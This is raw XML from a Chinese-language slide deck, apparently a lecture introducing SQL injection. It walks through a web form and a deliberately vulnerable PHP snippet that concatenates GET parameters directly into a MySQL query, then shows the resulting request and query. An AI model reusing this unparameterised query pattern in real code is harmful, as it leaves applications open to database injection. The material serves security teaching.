        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536709" y="3198308"/>
              <a:ext cx="1872640" cy="1015663"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>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数据库驱动的</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应用通常包含三层</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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143020" y="5447023"/>
            <a:ext cx="10572710" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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浏览器（表示层）向中间层（</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服务器）发送请求，中间层通过查询、更新数据库（存储层）来响应该请求。</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当用户通过</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表单提交数据时，如果输入框的值没有经过有效性检查，则这些数据将会作为</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查询的一部分。</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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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17">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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17">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36"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837929"/>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例如</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8" name="íṡľíḍè-Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684960" y="1456085"/>
            <a:ext cx="4680519"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prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>如果一个网页的表单通过如下代码实现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="íṡľíḍè-Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684960" y="3688333"/>
            <a:ext cx="1910779"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000" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>核心代码如下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="表格 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2684960" y="2040222"/>
          <a:ext cx="7492755" cy="1485050"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7492755"/>
              </a:tblGrid>
              <a:tr h="1485050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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 action=”</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="17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xxx.php”method</a:t>
                      </a:r>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=”GET”&gt;</a:t>
                      </a:r>
                      <a:endPar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type=”text” name=”user”/&gt; </a:t>
                      </a:r>
                      <a:endPar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type=”text” name=”</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="17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passwd</a:t>
                      </a:r>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type=”submit”/&gt;</a:t>
                      </a:r>
                      <a:endPar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&lt;/form&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="17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tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="表格 11"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2684959" y="4264397"/>
          <a:ext cx="7492755" cy="2326682"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7492755"/>
              </a:tblGrid>
              <a:tr h="2304062">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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endPar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1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sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2100" b="1" kern="12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="select * from table where user=$_GET[“user”] and password=$_GET[“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="21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passwd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2100" b="1" kern="12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100" b="1" kern="12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$result=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mysql_query</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sql</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执行查询</a:t>
                      </a:r>
                      <a:endPar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en-US" sz="2100" dirty="0">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par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="15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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149127" y="1168053"/>
            <a:ext cx="10099988" cy="961289"/>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当用户通过浏览器向表单提交了用户名“</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bob</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abc123</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时，那么下面的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查询将被发送给</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矩形: 圆角 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2108609" y="2392189"/>
            <a:ext cx="8641531" cy="7200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http://xxxx.com/xxx.php?user=bob&amp;passwd=abc123</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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149127" y="3616325"/>
            <a:ext cx="10099988" cy="961289"/>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服务器收到这个请求时，将构建并执行一条（发送给数据库服务器的）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查询。在这个示例中，该</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请求如下所示：</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矩形: 圆角 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149127" y="4840461"/>
            <a:ext cx="10560496" cy="7200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SELECT * FROM table WHERE user=’bob’ and password=’abc123’</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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>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strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23"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4" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/tags/tag1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst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 name="COMMONDATA" val="eyJoZGlkIjoiZTIxZjE4NWUxYTgwYjkwOTU3MDRkZDUzZjFmYTk3MWMifQ=="/>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9489</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>433</Paragraphs>
  <Slides>47</Slides>
  <Notes>48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47</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="60" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>华文楷体</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Jan</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-21T13:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-29T08:18:44Z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D381004B285546E0BF52BA3A89D37ACC</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.11744</vt:lpwstr>
  </property>
</Properties>
</file>